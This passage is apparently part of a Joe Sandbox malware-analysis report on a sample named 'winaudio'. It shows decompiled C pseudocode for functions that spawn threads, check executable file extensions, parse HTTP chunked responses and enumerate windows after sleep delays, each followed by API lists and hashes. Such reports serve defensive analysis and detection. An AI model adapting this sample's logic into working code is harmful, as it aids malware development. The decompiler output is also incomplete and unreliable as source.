                        • Associated: 00000000.00000002.508826340.0000000000406000.00000080.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.508833220.0000000000407000.00000004.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_2b0000_winaudio.jbxd
                        Similarity
                        • API ID: Process$CloseErrorHandleLastOpenWow64
                        • String ID: c:\windows\temp\winaudio.dll
                        • API String ID: 3226452292-3304725038
                        • Opcode ID: 4a61b79e22ac02fe6b5965b667713750445f5ebc6b22fcc16590867fa544297f
                        • Instruction ID: 0b47804d367fff5047229aaff39bdbfaceaa78bd281f2bf645f5e87c282f09fc
                        • Opcode Fuzzy Hash: 4a61b79e22ac02fe6b5965b667713750445f5ebc6b22fcc16590867fa544297f
                        • Instruction Fuzzy Hash: 46313771A102149BD721EF68EC46BEEB3A8DB11710F4042A7F845DA2C1DBB49ED0CF91
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 002D5090 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 62threadCOMMON
                        Download Yara Rule
                        C-Code - Quality: 100%
                        			E002D5090(void* __ecx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12) {
				intOrPtr _t19;
				void* _t20;
				intOrPtr _t25;
				void* _t26;
				signed int _t28;
				signed int _t30;
				void* _t43;

				_t19 =  *0x3ebb00; // 0x6556
				_t20 = _t19 + 2;
				 *0x3f0830 = 0x7ff7;
				_t43 = __ecx;
				_t21 =  >  ? 0 : _t20;
				 *0x3ebb00 =  >  ? 0 : _t20;
				 *((intOrPtr*)(__ecx + 0x10)) = _a4;
				 *__ecx = 0x3dce9c;
				 *((char*)(__ecx + 0xc)) = 0;
				 *((char*)(__ecx + 0xd)) = 0;
				 *((intOrPtr*)(__ecx + 0x14)) = _a8;
				 *((intOrPtr*)(__ecx + 4)) = 0;
				 *__ecx = 0x3dd4f8;
				 *((intOrPtr*)(__ecx + 0x18)) = _a12;
				if( *((intOrPtr*)(__ecx + 0xd)) == 0) {
					if( *((intOrPtr*)(__ecx + 4)) == 0) {
						_t12 = _t43 + 8; // 0x8
						 *(_t43 + 4) = CreateThread(0, 0, E002D2270, __ecx, 4, _t12);
					}
					 *0x3f0830 = 0x7ff7;
					 *((char*)(_t43 + 0xc)) = ResumeThread( *(_t43 + 4)) & 0xffffff00 | _t35 != 0xffffffff;
				}
				_t25 =  *0x3ebb08; // 0x6556
				_t26 = _t25 + 2;
				_t27 =  >  ? 0 : _t26;
				 *0x3ebb08 =  >  ? 0 : _t26;
				_t28 =  *0x3eb500; // 0x6556
				_t30 =  >  ? 0 : _t28 + 2;
				 *0x3eb500 = _t30;
				 *0x3f0830 = _t30 & 0x00000019 | 0x000000e0;
				SetThreadPriority( *(_t43 + 4), 1);
				return _t43;
			}










                        0x002d5093
                        0x002d5098
                        0x002d509b
                        0x002d50a6
                        0x002d50af
                        0x002d50b2
                        0x002d50ba
                        0x002d50c0
                        0x002d50c6
                        0x002d50ca
                        0x002d50ce
                        0x002d50d4
                        0x002d50db
                        0x002d50e1
                        0x002d50e7
                        0x002d50ec
                        0x002d50ee
                        0x002d5102
                        0x002d5102
                        0x002d5108
                        0x002d511e
                        0x002d511e
                        0x002d5121
                        0x002d5128
                        0x002d5135
                        0x002d5138
                        0x002d513d
                        0x002d514a
                        0x002d514d
                        0x002d515a
                        0x002d515f
                        0x002d5169

                        APIs
                        • CreateThread.KERNEL32(00000000,00000000,Function_00022270,00000000,00000004,00000008), ref: 002D50FC
                        • ResumeThread.KERNEL32(?,FFFFFFFF,?,002D479C,00000000,00000000,from client request), ref: 002D5112
                        • SetThreadPriority.KERNEL32(?,00000001,FFFFFFFF,?,002D479C,00000000,00000000,from client request), ref: 002D515F
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.508009909.00000000002B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 002B0000, based on PE: true
                        • Associated: 00000000.00000002.507983807.00000000002B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.508009909.00000000003E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.508009909.00000000003F0000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.508009909.00000000003FF000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.508826340.0000000000406000.00000080.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.508833220.0000000000407000.00000004.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_2b0000_winaudio.jbxd
                        Similarity
                        • API ID: Thread$CreatePriorityResume
                        • String ID: @!-$pQ-
                        • API String ID: 2021017085-2971203448
                        • Opcode ID: 865be8fdcdf9253843275d02ba70ac29adf13f57c056fd436418140ea2158468
                        • Instruction ID: 13e1fc6c8680a5907a9ea1e24fd5a026cb382736d9522feb7800c0afeffe3e27
                        • Opcode Fuzzy Hash: 865be8fdcdf9253843275d02ba70ac29adf13f57c056fd436418140ea2158468
                        • Instruction Fuzzy Hash: DF2138B5514746CFD726CF28D885B67BBE8EB08714F048A2EE4AAC7390D3B4E840CB54
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 0039B6C8 Relevance: 8.8, APIs: 1, Strings: 4, Instructions: 51COMMON
                        Download Yara Rule
                        C-Code - Quality: 100%
                        			E0039B6C8(void* __ebx, void* __edi, intOrPtr _a4) {
				void* __esi;
				void* _t4;

				_t21 = __edi;
				_t10 = __ebx;
				if(_a4 != 0) {
					_t23 = E0039C018(_a4, 0x2e);
					if(_t3 == 0 || E003954D6(__ebx, __edi, _t23, _t23, L".exe") != 0 && E003954D6(__ebx, __edi, _t23, _t23, L".cmd") != 0 && E003954D6(_t10, _t21, _t23, _t23, L".bat") != 0 && E003954D6(_t10, _t21, _t23, _t23, L".com") != 0) {
						_t4 = 0;
					} else {
						_t4 = 1;
					}
					return _t4;
				} else {
					return 0;
				}
			}





                        0x0039b6c8
                        0x0039b6c8
                        0x0039b6d1
                        0x0039b6e2
                        0x0039b6e8
                        0x0039b72e
                        0x0039b732
                        0x0039b732
                        0x0039b732
                        0x0039b736
                        0x0039b6d3
                        0x0039b6d6
                        0x0039b6d6

                        APIs
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.508009909.00000000002B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 002B0000, based on PE: true
                        • Associated: 00000000.00000002.507983807.00000000002B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.508009909.00000000003E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.508009909.00000000003F0000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.508009909.00000000003FF000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.508826340.0000000000406000.00000080.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.508833220.0000000000407000.00000004.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_2b0000_winaudio.jbxd
                        Similarity
                        • API ID: _wcsrchr
                        • String ID: .bat$.cmd$.com$.exe
                        • API String ID: 1752292252-4019086052
                        • Opcode ID: 84e5ab2eedbbdb4f3f5490ea35b16a1de57137701657df20d1a9d14308c45d66
                        • Instruction ID: ce89a7ea26c161e1ee0dfb4b65ece8b0136c2d917d5e6846ac91820edb564773
                        • Opcode Fuzzy Hash: 84e5ab2eedbbdb4f3f5490ea35b16a1de57137701657df20d1a9d14308c45d66
                        • Instruction Fuzzy Hash: 3EF0F637199B1725DD272091BD03AEB5788DF823B1B22511BF4046DAC1DFA1E8C181A4
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 0038BD56 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 50COMMONLIBRARYCODE
                        Download Yara Rule
                        C-Code - Quality: 71%
                        			E0038BD56(void* __ebx, void* __ecx, void* __edx) {
				void* __edi;
				void* __esi;
				intOrPtr _t2;
				void* _t3;
				void* _t4;
				intOrPtr _t9;
				void* _t11;
				void* _t20;
				void* _t21;
				void* _t23;
				void* _t25;
				void* _t27;
				void* _t29;
				void* _t31;
				void* _t32;
				long _t36;
				long _t37;
				void* _t40;

				_t29 = __edx;
				_t23 = __ecx;
				_t20 = __ebx;
				_t36 = GetLastError();
				_t2 =  *0x3e61f8; // 0x6
				_t42 = _t2 - 0xffffffff;
				if(_t2 == 0xffffffff) {
					L2:
					_t3 = E0038B987(_t23, 1, 0x364);
					_t31 = _t3;
					_pop(_t25);
					if(_t31 != 0) {
						_t4 = E0038DC17(_t25, __eflags,  *0x3e61f8, _t31);
						__eflags = _t4;
						if(_t4 != 0) {
							E0038BBC8(_t25, _t31, "8c>");
							E0038B8FF(0);
							_t40 = _t40 + 0xc;
							__eflags = _t31;
							if(_t31 == 0) {
								goto L9;
							} else {
								goto L8;
							}
						} else {
							_push(_t31);
							goto L4;
						}
					} else {
						_push(_t3);
						L4:
						E0038B8FF();
						_pop(_t25);
						L9:
						SetLastError(_t36);
						E0038B8BC(_t20, _t25, _t29, _t31, _t36);
						asm("int3");
						_push(_t20);
						_push(_t36);
						_push(_t31);
						_t37 = GetLastError();
						_t21 = 0;
						_t9 =  *0x3e61f8; // 0x6
						_t45 = _t9 - 0xffffffff;
						if(_t9 == 0xffffffff) {
							L12:
							_t32 = E0038B987(_t25, 1, 0x364);
							_pop(_t27);
							if(_t32 != 0) {
								_t11 = E0038DC17(_t27, __eflags,  *0x3e61f8, _t32);
								__eflags = _t11;
								if(_t11 != 0) {
									E0038BBC8(_t27, _t32, "8c>");
									E0038B8FF(_t21);
									__eflags = _t32;
									if(_t32 != 0) {
										goto L19;
									} else {
										goto L18;
									}
								} else {
									_push(_t32);
									goto L14;
								}
							} else {
								_push(_t21);
								L14:
								E0038B8FF();
								L18:
								SetLastError(_t37);
							}
						} else {
							_t32 = E0038DBC1(_t25, _t45, _t9);
							if(_t32 != 0) {
								L19:
								SetLastError(_t37);
								_t21 = _t32;
							} else {
								goto L12;
							}
						}
						return _t21;
					}
				} else {
					_t31 = E0038DBC1(_t23, _t42, _t2);
					if(_t31 != 0) {
						L8:
						SetLastError(_t36);
						return _t31;
					} else {
						goto L2;
					}
				}
			}





















                        0x0038bd56
                        0x0038bd56
                        0x0038bd56
                        0x0038bd60
                        0x0038bd62
                        0x0038bd67
                        0x0038bd6a
                        0x0038bd78
                        0x0038bd7f
                        0x0038bd84
                        0x0038bd87
                        0x0038bd8a
                        0x0038bd9c
                        0x0038bda1
                        0x0038bda3
                        0x0038bdae
                        0x0038bdb5
                        0x0038bdba
                        0x0038bdbd
                        0x0038bdbf
                        0x00000000
                        0x00000000
                        0x00000000
                        0x00000000
                        0x0038bda5
                        0x0038bda5
                        0x00000000
                        0x0038bda5
                        0x0038bd8c
                        0x0038bd8c
                        0x0038bd8d
                        0x0038bd8d
                        0x0038bd92
                        0x0038bdcd
                        0x0038bdce
                        0x0038bdd4
                        0x0038bdd9
                        0x0038bddc
                        0x0038bddd
                        0x0038bdde
                        0x0038bde5
                        0x0038bde7
                        0x0038bde9
                        0x0038bdee
                        0x0038bdf1
                        0x0038bdff
                        0x0038be0b
                        0x0038be0e
                        0x0038be11
                        0x0038be23
                        0x0038be28
                        0x0038be2a
                        0x0038be35
                        0x0038be3b
                        0x0038be43
                        0x0038be45
                        0x00000000
                        0x00000000
                        0x00000000
                        0x00000000
                        0x0038be2c
                        0x0038be2c
                        0x00000000
                        0x0038be2c
                        0x0038be13
                        0x0038be13
                        0x0038be14
                        0x0038be14
                        0x0038be47
                        0x0038be48
                        0x0038be48
                        0x0038bdf3
                        0x0038bdf9
                        0x0038bdfd
                        0x0038be50
                        0x0038be51
                        0x0038be57
                        0x00000000
                        0x00000000
                        0x00000000
                        0x0038bdfd
                        0x0038be5e
                        0x0038be5e
                        0x0038bd6c
                        0x0038bd72
                        0x0038bd76
                        0x0038bdc1
                        0x0038bdc2
                        0x0038bdcc
                        0x00000000
                        0x00000000
                        0x00000000
                        0x0038bd76

                        APIs
                        • GetLastError.KERNEL32(?,?,00381022,003DF5B0,00000010), ref: 0038BD5A
                        • SetLastError.KERNEL32(00000000), ref: 0038BDC2
                        • SetLastError.KERNEL32(00000000), ref: 0038BDCE
                        • _abort.LIBCMT ref: 0038BDD4
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.508009909.00000000002B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 002B0000, based on PE: true
                        • Associated: 00000000.00000002.507983807.00000000002B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.508009909.00000000003E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.508009909.00000000003F0000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.508009909.00000000003FF000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.508826340.0000000000406000.00000080.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.508833220.0000000000407000.00000004.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_2b0000_winaudio.jbxd
                        Similarity
                        • API ID: ErrorLast$_abort
                        • String ID: 8c>
                        • API String ID: 88804580-1518881013
                        • Opcode ID: 6f4acccc1412dbd3800313814cc3b4d9f028dae75e041d8d5a8e6d2e5c072932
                        • Instruction ID: d192441d685c2f8400ec78bd55050a76e1921a918e2ffb72acef0f30e02b036d
                        • Opcode Fuzzy Hash: 6f4acccc1412dbd3800313814cc3b4d9f028dae75e041d8d5a8e6d2e5c072932
                        • Instruction Fuzzy Hash: 5EF02832140743B7C6237B3AAC1AE2A962D9FD0772F2605A4F814AA3D3EF3588054320
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 0037BEE0 Relevance: 7.7, APIs: 2, Strings: 3, Instructions: 182COMMON
                        Download Yara Rule
                        C-Code - Quality: 82%
                        			E0037BEE0(void* __ebx, void* __edi, void* __esi, char* _a4, intOrPtr _a8, intOrPtr* _a12, intOrPtr* _a16, intOrPtr* _a20) {
				signed int _v8;
				intOrPtr _v15;
				char _v16;
				char _v19;
				char _v26;
				char _v28;
				short _v31;
				char _v35;
				char _v60;
				char _v112;
				char _v113;
				intOrPtr* _v120;
				char* _v124;
				intOrPtr _v128;
				intOrPtr* _v132;
				intOrPtr* _v136;
				signed int _t53;
				char* _t55;
				void* _t57;
				intOrPtr _t60;
				void* _t76;
				void* _t90;
				void* _t100;
				void* _t103;
				void* _t107;
				intOrPtr* _t108;
				char* _t114;
				intOrPtr* _t115;
				void* _t116;
				intOrPtr _t119;
				void* _t123;
				intOrPtr* _t124;
				void* _t125;
				void* _t126;
				void* _t127;
				signed int _t128;
				void* _t129;
				void* _t130;
				void* _t131;
				void* _t132;
				void* _t133;

				_t123 = __esi;
				_t100 = __ebx;
				_t53 =  *0x3e1008; // 0x847b54ee
				_v8 = _t53 ^ _t128;
				asm("xorps xmm0, xmm0");
				_t55 = _a4;
				_v132 = _a12;
				_push(__edi);
				_t119 = _a8;
				_v120 = _a16;
				_v124 = _t55;
				_v136 = _a20;
				_v113 = 0;
				_v28 = 0;
				asm("movq [ebp-0x17], xmm0");
				_v19 = 0;
				if(_t119 > 5) {
					_t114 = _t55;
					_t116 = 5 - _t55;
					while( *_t114 != 0x20 ||  *((char*)(_t114 + 4)) != 0x20) {
						_t114 = _t114 + 1;
						if(_t116 + _t114 < _t119) {
							continue;
						} else {
						}
						goto L9;
					}
					_t115 = _t114 + 1;
					if(_t115 == 0) {
						_v28 = 0;
						_v26 = 0;
						 *((intOrPtr*)(E00380E9E())) = 0x16;
						E0037F971();
					} else {
						_v28 =  *_t115;
						_v26 =  *((intOrPtr*)(_t115 + 2));
					}
				}
				L9:
				_t57 = E00383442(_t119, _t123,  &_v28, "200");
				_t130 = _t129 + 8;
				if(_t57 == 0) {
					_push(_t100);
					_push(_t123);
					asm("xorps xmm0, xmm0");
					_v60 = 0;
					asm("movq [ebp-0x27], xmm0");
					asm("movups [ebp-0x37], xmm0");
					_v35 = 0;
					_v31 = 0;
					wsprintfA( &_v60, "Transfer-Encoding: chunked");
					_t124 =  &_v60;
					_t131 = _t130 + 8;
					_t28 = _t124 + 1; // 0x1
					_t107 = _t28;
					do {
						_t60 =  *_t124;
						_t124 = _t124 + 1;
					} while (_t60 != 0);
					_t125 = _t124 - _t107;
					E0037E1A0(_t119,  &_v112, 0, 0x33);
					_t132 = _t131 + 0xc;
					if(_t125 < _t119) {
						_t103 = _t125;
						_v128 = _v124 - _t125;
						asm("o16 nop [eax+eax]");
						while(1) {
							E0037E1A0(_t119,  &_v112, 0, 0x33);
							E0037A830( &_v112, _t125, _v128 + _t103, _t125);
							_t90 = E00383442(_t119, _t125,  &_v112,  &_v60);
							_t132 = _t132 + 0x24;
							if(_t90 == 0) {
								break;
							}
							_t103 = _t103 + 1;
							if(_t103 < _t119) {
								continue;
							} else {
							}
							goto L19;
						}
						 *_v132 = 1;
					}
					L19:
					_v16 = 0;
					_v15 = 0;
					wsprintfA( &_v16, "\r\n\r\n");
					_t133 = _t132 + 8;
					_t101 = 0;
					if(_t119 <= 4) {
						goto L26;
					} else {
						_t41 = _t101 + 4; // 0x4
						_t127 = _t41;
						while(1) {
							E0037E1A0(_t119,  &_v112, 0, 0x33);
							E0037A830( &_v112, 4, _v124 + 0xfffffffc + _t127, 4);
							_t76 = E00383442(_t119, _t127,  &_v112,  &_v16);
							_t133 = _t133 + 0x24;
							if(_t76 == 0) {
								break;
							}
							_t127 = _t127 + 1;
							_t101 = _t101 + 1;
							if(_t127 < _t119) {
								continue;
							} else {
								L26:
								_t108 = _v120;
							}
							goto L27;
						}
						_t108 = _v120;
						_t49 = _t101 + 4; // 0x4
						 *_t108 = _t49;
					}
					L27:
					_pop(_t126);
					 *_v136 = _t119 -  *_t108;
					return E002E056D(_v8 ^ _t128, _t116, _t126);
				} else {
					return E002E056D(_v8 ^ _t128, _t116, _t123);
				}
			}












































                        0x0037bee0
                        0x0037bee0
                        0x0037bee9
                        0x0037bef0
                        0x0037bef6
                        0x0037bef9
                        0x0037befc
                        0x0037bf02
                        0x0037bf03
                        0x0037bf06
                        0x0037bf0c
                        0x0037bf0f
                        0x0037bf15
                        0x0037bf19
                        0x0037bf1d
                        0x0037bf22
                        0x0037bf29
                        0x0037bf30
                        0x0037bf32
                        0x0037bf34
                        0x0037bf3f
                        0x0037bf45
                        0x00000000
                        0x00000000
                        0x0037bf47
                        0x00000000
                        0x0037bf45
                        0x0037bf49
                        0x0037bf4c
                        0x0037bf5f
                        0x0037bf63
                        0x0037bf6b
                        0x0037bf71
                        0x0037bf4e
                        0x0037bf51
                        0x0037bf58
                        0x0037bf58
                        0x0037bf4c
                        0x0037bf76
                        0x0037bf7f
                        0x0037bf84
                        0x0037bf89
                        0x0037bf9c
                        0x0037bf9d
                        0x0037bf9e
                        0x0037bfa1
                        0x0037bfa8
                        0x0037bfb3
                        0x0037bfb7
                        0x0037bfbe
                        0x0037bfc4
                        0x0037bfca
                        0x0037bfcd
                        0x0037bfd0
                        0x0037bfd0
                        0x0037bfd3
                        0x0037bfd3
                        0x0037bfd5
                        0x0037bfd6
                        0x0037bfdf
                        0x0037bfe4
                        0x0037bfe9
                        0x0037bfee
                        0x0037bff3
                        0x0037bff7
                        0x0037bffa
                        0x0037c000
                        0x0037c008
                        0x0037c019
                        0x0037c026
                        0x0037c02b
                        0x0037c030
                        0x00000000
                        0x00000000
                        0x0037c032
                        0x0037c035
                        0x00000000
                        0x00000000
                        0x0037c037
                        0x00000000
                        0x0037c035
                        0x0037c03c
                        0x0037c03c
                        0x0037c042
                        0x0037c045
                        0x0037c04f
                        0x0037c056
                        0x0037c05c
                        0x0037c05f
                        0x0037c064
                        0x00000000
                        0x0037c066
                        0x0037c066
                        0x0037c066
                        0x0037c070
                        0x0037c078
                        0x0037c08e
                        0x0037c09b
                        0x0037c0a0
                        0x0037c0a5
                        0x00000000
                        0x00000000
                        0x0037c0a7
                        0x0037c0a8
                        0x0037c0ab
                        0x00000000
                        0x0037c0ad
                        0x0037c0c0
                        0x0037c0c0
                        0x0037c0c0
                        0x00000000
                        0x0037c0ab
                        0x0037c0b2
                        0x0037c0b5
                        0x0037c0b8
                        0x0037c0ba
                        0x0037c0c3
                        0x0037c0cb
                        0x0037c0cd
                        0x0037c0dd
                        0x0037bf8b
                        0x0037bf9b
                        0x0037bf9b

                        APIs
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.508009909.00000000002B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 002B0000, based on PE: true
                        • Associated: 00000000.00000002.507983807.00000000002B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.508009909.00000000003E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.508009909.00000000003F0000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.508009909.00000000003FF000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.508826340.0000000000406000.00000080.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.508833220.0000000000407000.00000004.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_2b0000_winaudio.jbxd
                        Similarity
                        • API ID: wsprintf
                        • String ID: $200$Transfer-Encoding: chunked
                        • API String ID: 2111968516-1537165108
                        • Opcode ID: 3f185d058a363a4417ebc4f0b0d0aa27e49d4239f42f2e8ba5c82d8606ec51ad
                        • Instruction ID: a2c848caa064016106cf216e9590b19fa134599139fd6d9bf387f9d54df7eef2
                        • Opcode Fuzzy Hash: 3f185d058a363a4417ebc4f0b0d0aa27e49d4239f42f2e8ba5c82d8606ec51ad
                        • Instruction Fuzzy Hash: 6061D531E04248DFDB22DFB4CC81BEEBBB8AF09304F108159E559EB242D7759A44CBA1
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 002F7AF0 Relevance: 7.6, APIs: 6, Instructions: 148COMMON
                        Download Yara Rule
                        C-Code - Quality: 76%
                        			E002F7AF0(void* __ebx, void* __edi, char* _a4, char* _a8) {
				signed int _v8;
				short _v24;
				char* _v28;
				int _v32;
				int _v36;
				void* _v48;
				void* __esi;
				signed int _t31;
				char _t33;
				int _t34;
				short* _t37;
				char _t41;
				char* _t59;
				char* _t65;
				char* _t69;
				char* _t77;
				char* _t79;
				int _t85;
				void* _t87;
				void* _t89;
				void* _t90;
				void* _t91;
				signed int _t92;
				short* _t93;

				E00397C10();
				_t31 =  *0x3e1008; // 0x847b54ee
				_v8 = _t31 ^ _t92;
				_t59 = _a8;
				_t79 = _a4;
				_t65 = _t79;
				_v28 = _t59;
				_t77 =  &(_t65[1]);
				do {
					_t33 =  *_t65;
					_t65 =  &(_t65[1]);
				} while (_t33 != 0);
				_v36 = 8;
				_t34 = _t65 - _t77 + 1;
				_v32 = _t34;
				_t85 = MultiByteToWideChar(0xfde9, 8, _t79, _t34, 0, 0);
				if(_t85 > 0) {
					L8:
					E00397C40();
					_t37 = _t93;
					_v28 = _t37;
					if(MultiByteToWideChar(0xfde9, _v36, _t79, _v32, _t37, _t85) == 0) {
						goto L17;
					} else {
						_t69 = _t59;
						_t77 =  &(_t69[1]);
						do {
							_t41 =  *_t69;
							_t69 =  &(_t69[1]);
						} while (_t41 != 0);
						if(MultiByteToWideChar(0xfde9, 0, _t59, _t69 - _t77 + 1,  &_v24, 8) == 0) {
							goto L17;
						} else {
							if(E003804DA(_v28,  &_v24) != 0 ||  *((intOrPtr*)(E00380E9E())) != 2 &&  *((intOrPtr*)(E00380E9E())) != 9) {
								_pop(_t89);
								return E002E056D(_v8 ^ _t92, _t77, _t89);
							} else {
								E003804F1(_t79, _t59);
								_pop(_t90);
								return E002E056D(_v8 ^ _t92, _t77, _t90);
							}
						}
					}
				} else {
					if(GetLastError() != 0x3ec) {
						L5:
						if(GetLastError() != 0x459) {
							L17:
							_pop(_t87);
							return E002E056D(_v8 ^ _t92, _t77, _t87);
						} else {
							E003804F1(_t79, _v28);
							_pop(_t91);
							return E002E056D(_v8 ^ _t92, _t77, _t91);
						}
					} else {
						_v36 = 0;
						_t85 = MultiByteToWideChar(0xfde9, 0, _t79, _v32, 0, 0);
						if(_t85 > 0) {
							_t59 = _v28;
							goto L8;
						} else {
							goto L5;
						}
					}
				}
			}



























                        0x002f7af8
                        0x002f7afd
                        0x002f7b04
                        0x002f7b08
                        0x002f7b0d
                        0x002f7b10
                        0x002f7b12
                        0x002f7b15
                        0x002f7b18
                        0x002f7b18
                        0x002f7b1a
                        0x002f7b1b
                        0x002f7b23
                        0x002f7b2c
                        0x002f7b38
                        0x002f7b41
                        0x002f7b45
                        0x002f7ba8
                        0x002f7bab
                        0x002f7bb0
                        0x002f7bbd
                        0x002f7bcd
                        0x00000000
                        0x002f7bd3
                        0x002f7bd3
                        0x002f7bd5
                        0x002f7bd8
                        0x002f7bd8
                        0x002f7bda
                        0x002f7bdb
                        0x002f7bf7
                        0x00000000
                        0x002f7bf9
                        0x002f7c0c
                        0x002f7c46
                        0x002f7c55
                        0x002f7c22
                        0x002f7c24
                        0x002f7c30
                        0x002f7c3f
                        0x002f7c3f
                        0x002f7c0c
                        0x002f7bf7
                        0x002f7b47
                        0x002f7b54
                        0x002f7b78
                        0x002f7b7f
                        0x002f7c56
                        0x002f7c5c
                        0x002f7c6b
                        0x002f7b85
                        0x002f7b89
                        0x002f7b95
                        0x002f7ba4
                        0x002f7ba4
                        0x002f7b56
                        0x002f7b5d
                        0x002f7b72
                        0x002f7b76
                        0x002f7ba5
                        0x00000000
                        0x00000000
                        0x00000000
                        0x00000000
                        0x002f7b76
                        0x002f7b54

                        APIs
                        • MultiByteToWideChar.KERNEL32(0000FDE9,00000008,?,?,00000000,?,?,?,?,00000000), ref: 002F7B3B
                        • GetLastError.KERNEL32(?,?,?,?,00000000), ref: 002F7B4D
                        • MultiByteToWideChar.KERNEL32(0000FDE9,00000000,?,?,00000000,00000000,?,?,?,?,00000000), ref: 002F7B6C
                        • GetLastError.KERNEL32(?,?,?,?,00000000), ref: 002F7B78
                        • MultiByteToWideChar.KERNEL32(0000FDE9,00000008,?,?,?,00000000,?,?,?,?,00000000), ref: 002F7BC9
                        • MultiByteToWideChar.KERNEL32(0000FDE9,00000000,?,?,?,00000008,?,00000000,?,?,?,?,00000000), ref: 002F7BF3
                        Memory Dump Source
                        • Source File: 00000000.00000002.508009909.00000000002B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 002B0000, based on PE: true
                        • Associated: 00000000.00000002.507983807.00000000002B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.508009909.00000000003E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.508009909.00000000003F0000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.508009909.00000000003FF000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.508826340.0000000000406000.00000080.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.508833220.0000000000407000.00000004.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_2b0000_winaudio.jbxd
                        Similarity
                        • API ID: ByteCharMultiWide$ErrorLast
                        • String ID:
                        • API String ID: 1717984340-0
                        • Opcode ID: 0522687b4c04890554d6fcc4a78e54b7648419df2674905cc80fc46633a75df3
                        • Instruction ID: 82743ba457eca57e11588417389cf3bf1491ee3f7240c789e483a270944f2210
                        • Opcode Fuzzy Hash: 0522687b4c04890554d6fcc4a78e54b7648419df2674905cc80fc46633a75df3
                        • Instruction Fuzzy Hash: 8541E631E401099BDF21EFA5DC42BFEB778EF49750F40017AEA05AB281D6719D25CBA1
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 002D5EA0 Relevance: 7.5, APIs: 5, Instructions: 48sleepCOMMON
                        Download Yara Rule
                        C-Code - Quality: 60%
                        			E002D5EA0(void* __ebx, void* __edi, void* __esi, long _a4) {
				intOrPtr* _v0;
				signed int _v12;
				signed int _v36;
				signed int _t16;
				signed int _t20;
				signed int _t22;
				void* _t34;
				long _t36;
				void* _t37;
				void* _t40;

				_t28 = __ebx;
				_push(__edi);
				_t36 = _a4;
				if(_t36 != 0) {
					_t20 =  *0x3ebb74; // 0x6556
					_push(__ebx);
					_t22 =  >  ? 0 : _t20 + 2;
					 *0x3ebb74 = _t22;
					_t40 = 0;
					 *0x3f0830 = _t22 & 0x00000019 | 0x000000e0;
					Sleep(0x1f40);
					if(EnumWindows(E002D5DF0, _t36) != 0) {
						while(1) {
							_t40 = _t40 + 1;
							if(_t40 > 0x1e) {
								goto L4;
							}
							Sleep(0x64);
							if(EnumWindows(E002D5DF0, _t36) != 0) {
								continue;
							}
							goto L4;
						}
					}
					L4:
					Sleep(0x1f4);
					_t30 = _t36;
					E002D5C20(_t36);
					_pop(_t28);
				}
				_pop(_t37);
				_pop(_t44);
				_push(0);
				E003810B3(_t30);
				asm("int3");
				_push(_v0);
				E003810B3(_t30);
				asm("int3");
				E002E1020(0x3df5d0, 0xc);
				_v36 = _v36 & 0x00000000;
				E00380FD5( *_v0);
				_v12 = _v12 & 0x00000000;
				_t16 = E00381925(_t28, _a4, _t34, _t37, _v12); // executed
				_v36 = _t16;
				_v12 = 0xfffffffe;
